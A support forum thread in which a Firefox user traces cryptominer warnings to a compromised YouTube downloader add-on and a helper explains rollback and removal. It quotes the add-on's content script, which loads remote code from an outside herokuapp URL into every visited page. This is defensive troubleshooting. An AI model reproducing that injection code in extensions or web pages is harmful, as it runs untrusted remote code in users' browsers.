Web Attacker: JSCoinminer Download 8 (Symantec Description Name)
As of today, 3/24/18, I keep getting web attacks with Firefox on all websites visited, attacks which are being blocked by my firewall, Symantec's "Norton Security":
Intrusion type: "JSCoinminer Download 8", as per Symantec's description
Attacker URL: thrillingos.herokuapp.com/mozilla/best-ytb-down/content/analytics
Happens through: "C:\Program Files (x86)\Mozilla Firefox\firefox.exe", although I use a 64-bit version of Firefox on Windows 7 (SP1), 64-bit.
Since it has "Mozilla" in the URL, does Mozilla know anything about this?
Happens on ALL websites, including, but not limited to, www.nytimes.com, www.washingtonpost.com, support.mozilla.org/
Another post suggested a Firefox add-on causing the problem, but all add-ons listed in Firefox are ones I have been using for at least a year, and originally came from the selection offered by Mozilla. Does Mozilla know if any of these have been compromised: AdBlocker Ultimate, Ghostery, HTTPS Everywhere, Video DownloadHelper, YouTube Best Video Downloader 2
degnmozilla said
Another post suggested a Firefox add-on causing the problem, but all add-ons listed in Firefox are ones I have been using for at least a year, and originally came from the selection offered by Mozilla. Does Mozilla know if any of these have been compromised: AdBlocker Ultimate, Ghostery, HTTPS Everywhere, Video DownloadHelper, YouTube Best Video Downloader 2
Test by disabling half of them and seeing whether anything changes. If problems continue, try the other half.
Could you check for alien script files in your Firefox program folder? In particular, in these locations (varies for 32-bit / 64-bit):
- C:\Program Files\Mozilla Firefox\defaults\pref
- C:\Program Files (x86)\Mozilla Firefox\defaults\pref
Caution: Do not double-click script files! The default action for a script file is to execute as a Windows system script. (Typically this would just not work, but why risk it.)
Make sure Windows is showing hidden files: https://support.microsoft.com/en-us/help/14201/windows-show-hidden-files
A file named channel-prefs.js is normal. Any other file in this folder is suspicious. Remove any such files to a neutral location for further analysis at your leisure.
Changes here would take effect at your next startup.
By disabling "YouTube Best Video Downloader 2" the attacks stopped. Disabling the other add-ons listed above made no difference.
Right now I'm leaving "YouTube Best Video Downloader 2" disabled, and will continue to monitor whether that fixes the problem for good.
If this particular add-on is compromised, I would hope Mozilla would contact the developer about the problem. Also, if it is ever fixed, I would appreciate hearing that it is safe to use, again.
Thank you for your response above.
As to your other suggestion above, only "channel-prefs.js" is located in the directory you indicated, with "hidden files" showing.
I don't know why the extension uses that "attacker URL". When I submit that script to VirusTotal, there are 3 detections out of 58, so it's not clear whether it's really dangerous or just looks suspiciously similar to something else:
It seems intended to do some kind of global logging of certain activity in pages:
/content_script/content.js:

```javascript
//code to log event
(function () {
  // Create a <script> element whose src points at a remote server and attach it
  // to the page: whatever that server returns is loaded and executed in the
  // context of every page this content script runs in.
  var logContentEvent = document.createElement('script');
  logContentEvent.src = 'https://thrillingos.herokuapp.com/mozilla/best-ytb-down/content/analytics';
  document.body.appendChild(logContentEvent);
})();
```
This content.js script seems to be new in the latest release (March 17th). The only explanation of the change is:
" improved analytics to serve better"
To serve whom better?!
If you want to use this extension, you could roll back to the March 15th release. Here's how:
(1) Disable auto-updating for this extension
On the Add-ons page, click the "More" link for the extension and scroll down to the row with the "Automatic Updates" line (Default / On / Off / Check for Updates) and click "Off".
This should be saved without any need to click a Save button.
(2) Go to the extension's "Versions" page and install 8.5, the immediately previous version:
https://addons.mozilla.org/firefox/addon/youtube-download-mp3-mp4-1080p/versions/
As shown in the attached screenshot, the suspicious file does not exist in the earlier version.
Or if you no longer trust this add-on developer, you could just leave it disabled or remove it.
Chosen solution
I did as you suggested, and installed and enabled the previous 8.5 version, with updates disabled. As a result, I'm NOT getting the attack messages now from my Symantec firewall like I did when the newer version of the add-on was installed.
I also posted a message about the problem on the add-on's review page, and sent a message to Mozilla through the feedback option there. Another person had also posted, in German, a warning on the review page about the attacking URL.
Thank you for your quick and helpful response in all this. It is much appreciated.
Hi, glad you got things figured out. Please mark the answer with the solution as Solved.